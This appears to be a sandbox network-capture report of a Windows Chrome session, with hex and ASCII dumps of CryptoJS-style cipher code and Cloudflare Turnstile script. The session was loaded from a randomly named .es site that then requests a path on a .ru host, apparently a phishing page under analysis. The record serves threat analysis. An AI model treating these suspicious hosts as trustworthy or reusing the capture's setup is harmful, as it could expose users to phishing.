                                                                Data Ascii: N(){for(var t=this._X,e=this._C,r=0;r<8;r++)E[r]=e[r];e[0]=e[0]+1295307597+this._b|0,e[1]=e[1]+3545052371+(e[0]>>>0<E[0]>>>0?1:0)|0,e[2]=e[2]+886263092+(e[1]>>>0<E[1]>>>0?1:0)|0,e[3]=e[3]+1295307597+(e[2]>>>0<E[2]>>>0?1:0)|0,e[4]=e[4]+3545052371+(e[3]>>>
                                                                2025-03-19 16:55:48 UTC1369INData Raw: 3e 3e 3e 30 3f 31 3a 30 3b 66 6f 72 28 72 3d 30 3b 72 3c 38 3b 72 2b 2b 29 7b 76 61 72 20 69 3d 74 5b 72 5d 2b 65 5b 72 5d 2c 6e 3d 36 35 35 33 35 26 69 2c 6f 3d 69 3e 3e 3e 31 36 3b 49 5b 72 5d 3d 28 28 6e 2a 6e 3e 3e 3e 31 37 29 2b 6e 2a 6f 3e 3e 3e 31 35 29 2b 6f 2a 6f 5e 28 28 34 32 39 34 39 30 31 37 36 30 26 69 29 2a 69 7c 30 29 2b 28 28 36 35 35 33 35 26 69 29 2a 69 7c 30 29 7d 74 5b 30 5d 3d 49 5b 30 5d 2b 28 49 5b 37 5d 3c 3c 31 36 7c 49 5b 37 5d 3e 3e 3e 31 36 29 2b 28 49 5b 36 5d 3c 3c 31 36 7c 49 5b 36 5d 3e 3e 3e 31 36 29 7c 30 2c 74 5b 31 5d 3d 49 5b 31 5d 2b 28 49 5b 30 5d 3c 3c 38 7c 49 5b 30 5d 3e 3e 3e 32 34 29 2b 49 5b 37 5d 7c 30 2c 74 5b 32 5d 3d 49 5b 32 5d 2b 28 49 5b 31 5d 3c 3c 31 36 7c 49 5b 31 5d 3e 3e 3e 31 36 29 2b 28 49 5b 30
                                                                Data Ascii: >>>0?1:0;for(r=0;r<8;r++){var i=t[r]+e[r],n=65535&i,o=i>>>16;I[r]=((n*n>>>17)+n*o>>>15)+o*o^((4294901760&i)*i|0)+((65535&i)*i|0)}t[0]=I[0]+(I[7]<<16|I[7]>>>16)+(I[6]<<16|I[6]>>>16)|0,t[1]=I[1]+(I[0]<<8|I[0]>>>24)+I[7]|0,t[2]=I[2]+(I[1]<<16|I[1]>>>16)+(I[0
                                                                2025-03-19 16:55:48 UTC1369INData Raw: 79 28 74 2e 62 75 66 66 65 72 2c 74 2e 62 79 74 65 4f 66 66 73 65 74 2c 74 2e 62 79 74 65 4c 65 6e 67 74 68 29 3a 74 29 69 6e 73 74 61 6e 63 65 6f 66 20 55 69 6e 74 38 41 72 72 61 79 29 7b 66 6f 72 28 76 61 72 20 65 3d 74 2e 62 79 74 65 4c 65 6e 67 74 68 2c 72 3d 5b 5d 2c 69 3d 30 3b 69 3c 65 3b 69 2b 2b 29 72 5b 69 3e 3e 3e 32 5d 7c 3d 74 5b 69 5d 3c 3c 32 34 2d 69 25 34 2a 38 3b 73 2e 63 61 6c 6c 28 74 68 69 73 2c 72 2c 65 29 7d 65 6c 73 65 20 73 2e 61 70 70 6c 79 28 74 68 69 73 2c 61 72 67 75 6d 65 6e 74 73 29 7d 29 2e 70 72 6f 74 6f 74 79 70 65 3d 50 29 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 55 2c 6e 3d 74 2e 6c 69 62 2e 57 6f 72 64 41 72 72 61 79 2c 74 3d 74 2e 65 6e 63 3b 74 2e 55 74 66 31 36 3d 74 2e 55 74 66 31 36 42 45 3d 7b 73 74
                                                                Data Ascii: y(t.buffer,t.byteOffset,t.byteLength):t)instanceof Uint8Array){for(var e=t.byteLength,r=[],i=0;i<e;i++)r[i>>>2]|=t[i]<<24-i%4*8;s.call(this,r,e)}else s.apply(this,arguments)}).prototype=P),function(){var t=U,n=t.lib.WordArray,t=t.enc;t.Utf16=t.Utf16BE={st
                                                                2025-03-19 16:55:48 UTC1369INData Raw: 76 61 72 20 6f 3d 72 2e 63 68 61 72 41 74 28 36 34 29 3b 72 65 74 75 72 6e 21 6f 7c 7c 2d 31 21 3d 3d 28 6f 3d 74 2e 69 6e 64 65 78 4f 66 28 6f 29 29 26 26 28 65 3d 6f 29 2c 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 72 29 7b 66 6f 72 28 76 61 72 20 69 3d 5b 5d 2c 6e 3d 30 2c 6f 3d 30 3b 6f 3c 65 3b 6f 2b 2b 29 7b 76 61 72 20 73 2c 63 3b 6f 25 34 26 26 28 73 3d 72 5b 74 2e 63 68 61 72 43 6f 64 65 41 74 28 6f 2d 31 29 5d 3c 3c 6f 25 34 2a 32 2c 63 3d 72 5b 74 2e 63 68 61 72 43 6f 64 65 41 74 28 6f 29 5d 3e 3e 3e 36 2d 6f 25 34 2a 32 2c 63 3d 73 7c 63 2c 69 5b 6e 3e 3e 3e 32 5d 7c 3d 63 3c 3c 32 34 2d 6e 25 34 2a 38 2c 6e 2b 2b 29 7d 72 65 74 75 72 6e 20 61 2e 63 72 65 61 74 65 28 69 2c 6e 29 7d 28 74 2c 65 2c 69 29 7d 2c 5f 6d 61 70 3a 22 41 42 43 44 45 46 47
                                                                Data Ascii: var o=r.charAt(64);return!o||-1!==(o=t.indexOf(o))&&(e=o),function(t,e,r){for(var i=[],n=0,o=0;o<e;o++){var s,c;o%4&&(s=r[t.charCodeAt(o-1)]<<o%4*2,c=r[t.charCodeAt(o)]>>>6-o%4*2,c=s|c,i[n>>>2]|=c<<24-n%4*8,n++)}return a.create(i,n)}(t,e,i)},_map:"ABCDEFG
                                                                2025-03-19 16:55:48 UTC1369INData Raw: 39 36 2a 61 2e 61 62 73 28 61 2e 73 69 6e 28 74 2b 31 29 29 7c 30 7d 28 29 3b 65 3d 65 2e 4d 44 35 3d 69 2e 65 78 74 65 6e 64 28 7b 5f 64 6f 52 65 73 65 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 2e 5f 68 61 73 68 3d 6e 65 77 20 72 2e 69 6e 69 74 28 5b 31 37 33 32 35 38 34 31 39 33 2c 34 30 32 33 32 33 33 34 31 37 2c 32 35 36 32 33 38 33 31 30 32 2c 32 37 31 37 33 33 38 37 38 5d 29 7d 2c 5f 64 6f 50 72 6f 63 65 73 73 42 6c 6f 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 66 6f 72 28 76 61 72 20 72 3d 30 3b 72 3c 31 36 3b 72 2b 2b 29 7b 76 61 72 20 69 3d 65 2b 72 2c 6e 3d 74 5b 69 5d 3b 74 5b 69 5d 3d 31 36 37 31 31 39 33 35 26 28 6e 3c 3c 38 7c 6e 3e 3e 3e 32 34 29 7c 34 32 37 38 32 35 35 33 36 30 26 28 6e 3c 3c 32 34 7c 6e 3e 3e 3e 38 29 7d
                                                                Data Ascii: 96*a.abs(a.sin(t+1))|0}();e=e.MD5=i.extend({_doReset:function(){this._hash=new r.init([1732584193,4023233417,2562383102,271733878])},_doProcessBlock:function(t,e){for(var r=0;r<16;r++){var i=e+r,n=t[i];t[i]=16711935&(n<<8|n>>>24)|4278255360&(n<<24|n>>>8)}
                                                                2025-03-19 16:55:48 UTC1369INData Raw: 2c 32 33 2c 41 5b 33 39 5d 29 2c 6d 3d 43 28 6d 2c 62 2c 78 2c 53 2c 42 2c 34 2c 41 5b 34 30 5d 29 2c 53 3d 43 28 53 2c 6d 2c 62 2c 78 2c 73 2c 31 31 2c 41 5b 34 31 5d 29 2c 78 3d 43 28 78 2c 53 2c 6d 2c 62 2c 68 2c 31 36 2c 41 5b 34 32 5d 29 2c 62 3d 43 28 62 2c 78 2c 53 2c 6d 2c 64 2c 32 33 2c 41 5b 34 33 5d 29 2c 6d 3d 43 28 6d 2c 62 2c 78 2c 53 2c 5f 2c 34 2c 41 5b 34 34 5d 29 2c 53 3d 43 28 53 2c 6d 2c 62 2c 78 2c 67 2c 31 31 2c 41 5b 34 35 5d 29 2c 78 3d 43 28 78 2c 53 2c 6d 2c 62 2c 6b 2c 31 36 2c 41 5b 34 36 5d 29 2c 6d 3d 44 28 6d 2c 62 3d 43 28 62 2c 78 2c 53 2c 6d 2c 61 2c 32 33 2c 41 5b 34 37 5d 29 2c 78 2c 53 2c 73 2c 36 2c 41 5b 34 38 5d 29 2c 53 3d 44 28 53 2c 6d 2c 62 2c 78 2c 75 2c 31 30 2c 41 5b 34 39 5d 29 2c 78 3d 44 28 78 2c 53 2c 6d
                                                                Data Ascii: ,23,A[39]),m=C(m,b,x,S,B,4,A[40]),S=C(S,m,b,x,s,11,A[41]),x=C(x,S,m,b,h,16,A[42]),b=C(b,x,S,m,d,23,A[43]),m=C(m,b,x,S,_,4,A[44]),S=C(S,m,b,x,g,11,A[45]),x=C(x,S,m,b,k,16,A[46]),m=D(m,b=C(b,x,S,m,a,23,A[47]),x,S,s,6,A[48]),S=D(S,m,b,x,u,10,A[49]),x=D(x,S,m


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                4192.168.2.1649705104.18.94.414436444C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                TimestampBytes transferredDirectionData
                                                                2025-03-19 16:55:49 UTC689OUTGET /turnstile/v0/g/f3b948d8acb8/api.js HTTP/1.1
                                                                Host: challenges.cloudflare.com
                                                                Connection: keep-alive
                                                                sec-ch-ua-platform: "Windows"
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                                sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                                Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                                sec-ch-ua-mobile: ?0
                                                                Accept: */*
                                                                Sec-Fetch-Site: cross-site
                                                                Sec-Fetch-Mode: no-cors
                                                                Sec-Fetch-Dest: script
                                                                Sec-Fetch-Storage-Access: active
                                                                Referer: https://abdxo.qdhfwaes.es/
                                                                Accept-Encoding: gzip, deflate, br, zstd
                                                                Accept-Language: en-US,en;q=0.9
                                                                2025-03-19 16:55:49 UTC471INHTTP/1.1 200 OK
                                                                Date: Wed, 19 Mar 2025 16:55:49 GMT
                                                                Content-Type: application/javascript; charset=UTF-8
                                                                Content-Length: 48239
                                                                Connection: close
                                                                accept-ranges: bytes
                                                                last-modified: Fri, 28 Feb 2025 15:24:08 GMT
                                                                cache-control: max-age=31536000, stale-if-error=10800, stale-while-revalidate=31536000, public
                                                                access-control-allow-origin: *
                                                                cross-origin-resource-policy: cross-origin
                                                                Server: cloudflare
                                                                CF-RAY: 922e7fe5de390fe4-LAX
                                                                alt-svc: h3=":443"; ma=86400
                                                                2025-03-19 16:55:49 UTC898INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 48 74 28 65 2c 74 2c 61 2c 6f 2c 63 2c 6c 2c 76 29 7b 74 72 79 7b 76 61 72 20 68 3d 65 5b 6c 5d 28 76 29 2c 73 3d 68 2e 76 61 6c 75 65 7d 63 61 74 63 68 28 70 29 7b 61 28 70 29 3b 72 65 74 75 72 6e 7d 68 2e 64 6f 6e 65 3f 74 28 73 29 3a 50 72 6f 6d 69 73 65 2e 72 65 73 6f 6c 76 65 28 73 29 2e 74 68 65 6e 28 6f 2c 63 29 7d 66 75 6e 63 74 69 6f 6e 20 71 74 28 65 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 74 68 69 73 2c 61 3d 61 72 67 75 6d 65 6e 74 73 3b 72 65 74 75 72 6e 20 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 6f 2c 63 29 7b 76 61 72 20 6c 3d 65 2e 61 70 70 6c 79 28 74 2c 61 29 3b 66 75 6e 63 74
                                                                Data Ascii: "use strict";(function(){function Ht(e,t,a,o,c,l,v){try{var h=e[l](v),s=h.value}catch(p){a(p);return}h.done?t(s):Promise.resolve(s).then(o,c)}function qt(e){return function(){var t=this,a=arguments;return new Promise(function(o,c){var l=e.apply(t,a);funct
                                                                2025-03-19 16:55:49 UTC1369INData Raw: 20 65 7d 66 75 6e 63 74 69 6f 6e 20 49 72 28 65 2c 74 29 7b 76 61 72 20 61 3d 4f 62 6a 65 63 74 2e 6b 65 79 73 28 65 29 3b 69 66 28 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 29 7b 76 61 72 20 6f 3d 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 28 65 29 3b 74 26 26 28 6f 3d 6f 2e 66 69 6c 74 65 72 28 66 75 6e 63 74 69 6f 6e 28 63 29 7b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 28 65 2c 63 29 2e 65 6e 75 6d 65 72 61 62 6c 65 7d 29 29 2c 61 2e 70 75 73 68 2e 61 70 70 6c 79 28 61 2c 6f 29 7d 72 65 74 75 72 6e 20 61 7d 66 75 6e 63 74 69 6f 6e 20 69 74 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 74 3d 74 21 3d 6e 75
                                                                Data Ascii: e}function Ir(e,t){var a=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertySymbols(e);t&&(o=o.filter(function(c){return Object.getOwnPropertyDescriptor(e,c).enumerable})),a.push.apply(a,o)}return a}function it(e,t){return t=t!=nu
                                                                2025-03-19 16:55:49 UTC1369INData Raw: 72 61 79 24 2f 2e 74 65 73 74 28 61 29 29 72 65 74 75 72 6e 20 6f 74 28 65 2c 74 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 49 65 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 7a 74 28 65 29 7c 7c 42 74 28 65 2c 74 29 7c 7c 58 74 28 65 2c 74 29 7c 7c 47 74 28 29 7d 66 75 6e 63 74 69 6f 6e 20 46 28 65 29 7b 22 40 73 77 63 2f 68 65 6c 70 65 72 73 20 2d 20 74 79 70 65 6f 66 22 3b 72 65 74 75 72 6e 20 65 26 26 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 21 3d 22 75 6e 64 65 66 69 6e 65 64 22 26 26 65 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3d 3d 3d 53 79 6d 62 6f 6c 3f 22 73 79 6d 62 6f 6c 22 3a 74 79 70 65 6f 66 20 65 7d 66 75 6e 63 74 69 6f 6e 20 50 65 28 65 2c 74 29 7b 76 61 72 20 61 3d 7b 6c 61 62 65 6c 3a 30 2c 73 65 6e 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 6c 5b 30
                                                                Data Ascii: ray$/.test(a))return ot(e,t)}}function Ie(e,t){return zt(e)||Bt(e,t)||Xt(e,t)||Gt()}function F(e){"@swc/helpers - typeof";return e&&typeof Symbol!="undefined"&&e.constructor===Symbol?"symbol":typeof e}function Pe(e,t){var a={label:0,sent:function(){if(l[0
                                                                2025-03-19 16:55:49 UTC1369INData Raw: 74 69 6f 6e 3a 22 54 75 72 6e 73 74 69 6c 65 27 73 20 61 70 69 2e 6a 73 20 77 61 73 20 6c 6f 61 64 65 64 2c 20 62 75 74 20 74 68 65 20 69 66 72 61 6d 65 20 75 6e 64 65 72 20 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 6c 6f 61 64 65 64 2e 20 48 61 73 20 74 68 65 20 76 69 73 69 74 6f 72 20 62 6c 6f 63 6b 65 64 20 73 6f 6d 65 20 70 61 72 74 73 20 6f 66 20 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 20 6f 72 20 61 72 65 20 74 68 65 79 20 73 65 6c 66 2d 68 6f 73 74 69 6e 67 20 61 70 69 2e 6a 73 3f 22 7d 3b 76 61 72 20 51 74 3d 33 30 30 30 32 30 3b 76 61 72 20 57 65 3d 33 30 30 30 33 30 3b 76 61 72 20 55 65 3d 33 30 30 30 33 31 3b 76 61 72 20 71 3b 28 66 75
                                                                Data Ascii: tion:"Turnstile's api.js was loaded, but the iframe under challenges.cloudflare.com could not be loaded. Has the visitor blocked some parts of challenges.cloudflare.com or are they self-hosting api.js?"};var Qt=300020;var We=300030;var Ue=300031;var q;(fu
                                                                2025-03-19 16:55:49 UTC1369INData Raw: 6d 61 6e 75 61 6c 22 2c 65 2e 41 75 74 6f 3d 22 61 75 74 6f 22 7d 29 28 65 65 7c 7c 28 65 65 3d 7b 7d 29 29 3b 76 61 72 20 63 65 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 4e 65 76 65 72 3d 22 6e 65 76 65 72 22 2c 65 2e 4d 61 6e 75 61 6c 3d 22 6d 61 6e 75 61 6c 22 2c 65 2e 41 75 74 6f 3d 22 61 75 74 6f 22 7d 29 28 63 65 7c 7c 28 63 65 3d 7b 7d 29 29 3b 76 61 72 20 51 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 41 6c 77 61 79 73 3d 22 61 6c 77 61 79 73 22 2c 65 2e 45 78 65 63 75 74 65 3d 22 65 78 65 63 75 74 65 22 2c 65 2e 49 6e 74 65 72 61 63 74 69 6f 6e 4f 6e 6c 79 3d 22 69 6e 74 65 72 61 63 74 69 6f 6e 2d 6f 6e 6c 79 22 7d 29 28 51 7c 7c 28 51 3d 7b 7d 29 29 3b 76 61 72 20 6d 65 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 52 65 6e 64 65 72
                                                                Data Ascii: manual",e.Auto="auto"})(ee||(ee={}));var ce;(function(e){e.Never="never",e.Manual="manual",e.Auto="auto"})(ce||(ce={}));var Q;(function(e){e.Always="always",e.Execute="execute",e.InteractionOnly="interaction-only"})(Q||(Q={}));var me;(function(e){e.Render
                                                                2025-03-19 16:55:49 UTC1369INData Raw: 75 6e 63 74 69 6f 6e 20 70 74 28 65 29 7b 72 65 74 75 72 6e 20 4c 28 5b 4d 2e 4e 6f 72 6d 61 6c 2c 4d 2e 43 6f 6d 70 61 63 74 2c 4d 2e 49 6e 76 69 73 69 62 6c 65 2c 4d 2e 46 6c 65 78 69 62 6c 65 5d 2c 65 29 7d 66 75 6e 63 74 69 6f 6e 20 76 74 28 65 29 7b 72 65 74 75 72 6e 20 4c 28 5b 22 61 75 74 6f 22 2c 22 6d 61 6e 75 61 6c 22 2c 22 6e 65 76 65 72 22 5d 2c 65 29 7d 66 75 6e 63 74 69 6f 6e 20 6d 74 28 65 29 7b 72 65 74 75 72 6e 20 4c 28 5b 22 61 75 74 6f 22 2c 22 6d 61 6e 75 61 6c 22 2c 22 6e 65 76 65 72 22 5d 2c 65 29 7d 76 61 72 20 4e 72 3d 2f 5e 5b 61 2d 7a 5d 7b 32 2c 33 7d 28 5b 2d 5f 5d 5b 61 2d 7a 5d 7b 32 7d 29 3f 24 2f 69 3b 66 75 6e 63 74 69 6f 6e 20 67 74 28 65 29 7b 72 65 74 75 72 6e 20 65 3d 3d 3d 22 61 75 74 6f 22 7c 7c 4e 72 2e 74 65 73 74
                                                                Data Ascii: unction pt(e){return L([M.Normal,M.Compact,M.Invisible,M.Flexible],e)}function vt(e){return L(["auto","manual","never"],e)}function mt(e){return L(["auto","manual","never"],e)}var Nr=/^[a-z]{2,3}([-_][a-z]{2})?$/i;function gt(e){return e==="auto"||Nr.test
                                                                2025-03-19 16:55:49 UTC1369INData Raw: 72 22 2c 22 72 6f 2d 72 6f 22 5d 3b 66 75 6e 63 74 69 6f 6e 20 54 74 28 65 2c 74 29 7b 76 61 72 20 61 3d 22 68 74 74 70 73 3a 2f 2f 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 22 3b 69 66 28 74 29 7b 76 61 72 20 6f 3b 61 3d 28 6f 3d 65 5b 22 62 61 73 65 2d 75 72 6c 22 5d 29 21 3d 3d 6e 75 6c 6c 26 26 6f 21 3d 3d 76 6f 69 64 20 30 3f 6f 3a 61 7d 72 65 74 75 72 6e 20 61 7d 66 75 6e 63 74 69 6f 6e 20 52 74 28 65 2c 74 2c 61 2c 6f 2c 63 2c 6c 2c 76 2c 68 29 7b 76 61 72 20 73 3d 54 74 28 61 2c 63 29 2c 70 3d 6c 3f 22 68 2f 22 2e 63 6f 6e 63 61 74 28 6c 2c 22 2f 22 29 3a 22 22 2c 5f 3d 68 3f 22 3f 22 2e 63 6f 6e 63 61 74 28 68 29 3a 22 22 2c 41 3d 61 5b 22 66 65 65 64 62 61 63 6b 2d 65 6e 61 62 6c 65 64 22 5d 3d 3d 3d 21 31 3f 22
                                                                Data Ascii: r","ro-ro"];function Tt(e,t){var a="https://challenges.cloudflare.com";if(t){var o;a=(o=e["base-url"])!==null&&o!==void 0?o:a}return a}function Rt(e,t,a,o,c,l,v,h){var s=Tt(a,c),p=l?"h/".concat(l,"/"):"",_=h?"?".concat(h):"",A=a["feedback-enabled"]===!1?"
                                                                2025-03-19 16:55:49 UTC1369INData Raw: 65 63 74 2e 73 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 7c 7c 66 75 6e 63 74 69 6f 6e 28 6f 2c 63 29 7b 72 65 74 75 72 6e 20 6f 2e 5f 5f 70 72 6f 74 6f 5f 5f 3d 63 2c 6f 7d 2c 74 65 28 65 2c 74 29 7d 66 75 6e 63 74 69 6f 6e 20 75 72 28 65 2c 74 29 7b 69 66 28 74 79 70 65 6f 66 20 74 21 3d 22 66 75 6e 63 74 69 6f 6e 22 26 26 74 21 3d 3d 6e 75 6c 6c 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 53 75 70 65 72 20 65 78 70 72 65 73 73 69 6f 6e 20 6d 75 73 74 20 65 69 74 68 65 72 20 62 65 20 6e 75 6c 6c 20 6f 72 20 61 20 66 75 6e 63 74 69 6f 6e 22 29 3b 65 2e 70 72 6f 74 6f 74 79 70 65 3d 4f 62 6a 65 63 74 2e 63 72 65 61 74 65 28 74 26 26 74 2e 70 72 6f 74 6f 74 79 70 65 2c 7b 63 6f 6e 73 74 72 75 63 74 6f 72 3a 7b 76 61 6c 75 65 3a 65 2c 77
                                                                Data Ascii: ect.setPrototypeOf||function(o,c){return o.__proto__=c,o},te(e,t)}function ur(e,t){if(typeof t!="function"&&t!==null)throw new TypeError("Super expression must either be null or a function");e.prototype=Object.create(t&&t.prototype,{constructor:{value:e,w
                                                                2025-03-19 16:55:49 UTC1369INData Raw: 2c 63 6f 6e 66 69 67 75 72 61 62 6c 65 3a 21 30 7d 7d 29 2c 74 65 28 63 2c 6f 29 7d 2c 47 65 28 65 29 7d 66 75 6e 63 74 69 6f 6e 20 73 72 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 74 26 26 28 46 28 74 29 3d 3d 3d 22 6f 62 6a 65 63 74 22 7c 7c 74 79 70 65 6f 66 20 74 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 29 3f 74 3a 7a 65 28 65 29 7d 66 75 6e 63 74 69 6f 6e 20 64 72 28 65 29 7b 76 61 72 20 74 3d 42 65 28 29 3b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 6f 3d 6c 65 28 65 29 2c 63 3b 69 66 28 74 29 7b 76 61 72 20 6c 3d 6c 65 28 74 68 69 73 29 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3b 63 3d 52 65 66 6c 65 63 74 2e 63 6f 6e 73 74 72 75 63 74 28 6f 2c 61 72 67 75 6d 65 6e 74 73 2c 6c 29 7d 65 6c 73 65 20 63 3d 6f 2e 61 70 70 6c 79 28 74 68 69 73
                                                                Data Ascii: ,configurable:!0}}),te(c,o)},Ge(e)}function sr(e,t){return t&&(F(t)==="object"||typeof t=="function")?t:ze(e)}function dr(e){var t=Be();return function(){var o=le(e),c;if(t){var l=le(this).constructor;c=Reflect.construct(o,arguments,l)}else c=o.apply(this
                                                                2025-03-19 16:55:49 UTC1369INData Raw: 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 61 29 7b 76 61 72 20 6f 3d 54 74 28 74 2e 70 61 72 61 6d 73 2c 21 31 29 2c 63 3d 22 68 2f 22 2e 63 6f 6e 63 61 74 28 22 67 22 2c 22 2f 22 29 2c 6c 2c 76 2c 68 3d 22 22 2e 63 6f 6e 63 61 74 28 6f 2c 22 2f 63 64 6e 2d 63 67 69 2f 63 68 61 6c 6c 65 6e 67 65 2d 70 6c 61 74 66 6f 72 6d 2f 22 29 2e 63 6f 6e 63 61 74 28 63 2c 22 66 65 65 64 62 61 63 6b 2d 72 65 70 6f 72 74 73 2f 22 29 2e 63 6f 6e 63 61 74 28 58 65 28 65 29 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 74 2e 64 69 73 70 6c 61 79 4c 61 6e 67 75 61 67 65 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 28 76 3d 74 2e 70 61 72 61 6d 73 2e 74 68 65 6d 65 29 21 3d 3d 6e 75 6c 6c 26 26 76 21 3d 3d 76 6f 69 64 20 30 3f 76 3a 74 2e 74 68 65 6d 65 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28
                                                                Data Ascii: unction(e,t,a){var o=Tt(t.params,!1),c="h/".concat("g","/"),l,v,h="".concat(o,"/cdn-cgi/challenge-platform/").concat(c,"feedback-reports/").concat(Xe(e),"/").concat(t.displayLanguage,"/").concat((v=t.params.theme)!==null&&v!==void 0?v:t.theme,"/").concat(


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                5192.168.2.164970635.190.80.14436444C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                TimestampBytes transferredDirectionData
                                                                2025-03-19 16:55:49 UTC559OUTOPTIONS /report/v4?s=7LZPigoFhvALOM1VTa7BK1%2FMbIxCPLKX%2FKudtsWlmV%2FxPZHTNSeJEWl%2Bk84ToP3t2%2FLG%2BJuDJCXY9d8AEN9ZSUTliM6b23KKlLPuwWinOaWH1GvUVxg9MeD%2Bb9izWV2GXbw2V%2BIk HTTP/1.1
                                                                Host: a.nel.cloudflare.com
                                                                Connection: keep-alive
                                                                Origin: https://cdnjs.cloudflare.com
                                                                Access-Control-Request-Method: POST
                                                                Access-Control-Request-Headers: content-type
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                                Accept-Encoding: gzip, deflate, br, zstd
                                                                Accept-Language: en-US,en;q=0.9


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                6192.168.2.1649708104.16.2.1894436444C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                TimestampBytes transferredDirectionData
                                                                2025-03-19 16:55:50 UTC638OUTGET /favicon.png HTTP/1.1
                                                                Host: developers.cloudflare.com
                                                                Connection: keep-alive
                                                                sec-ch-ua-platform: "Windows"
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                                sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                                sec-ch-ua-mobile: ?0
                                                                Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                Sec-Fetch-Site: cross-site
                                                                Sec-Fetch-Mode: no-cors
                                                                Sec-Fetch-Dest: image
                                                                Sec-Fetch-Storage-Access: active
                                                                Referer: https://abdxo.qdhfwaes.es/
                                                                Accept-Encoding: gzip, deflate, br, zstd
                                                                Accept-Language: en-US,en;q=0.9


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                7192.168.2.1649721188.114.97.34436444C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                TimestampBytes transferredDirectionData
                                                                2025-03-19 16:56:08 UTC569OUTGET /chiriya!efabej HTTP/1.1
                                                                Host: mmeb6h.ptkeol.ru
                                                                Connection: keep-alive
                                                                sec-ch-ua-platform: "Windows"
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                                sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                                sec-ch-ua-mobile: ?0
                                                                Accept: */*
                                                                Origin: https://abdxo.qdhfwaes.es
                                                                Sec-Fetch-Site: cross-site
                                                                Sec-Fetch-Mode: cors
                                                                Sec-Fetch-Dest: empty
                                                                Referer: https://abdxo.qdhfwaes.es/
                                                                Accept-Encoding: gzip, deflate, br, zstd
                                                                Accept-Language: en-US,en;q=0.9


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                8192.168.2.164972735.190.80.14436444C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                TimestampBytes transferredDirectionData
                                                                2025-03-19 16:56:49 UTC559OUTOPTIONS /report/v4?s=7LZPigoFhvALOM1VTa7BK1%2FMbIxCPLKX%2FKudtsWlmV%2FxPZHTNSeJEWl%2Bk84ToP3t2%2FLG%2BJuDJCXY9d8AEN9ZSUTliM6b23KKlLPuwWinOaWH1GvUVxg9MeD%2Bb9izWV2GXbw2V%2BIk HTTP/1.1
                                                                Host: a.nel.cloudflare.com
                                                                Connection: keep-alive
                                                                Origin: https://cdnjs.cloudflare.com
                                                                Access-Control-Request-Method: POST
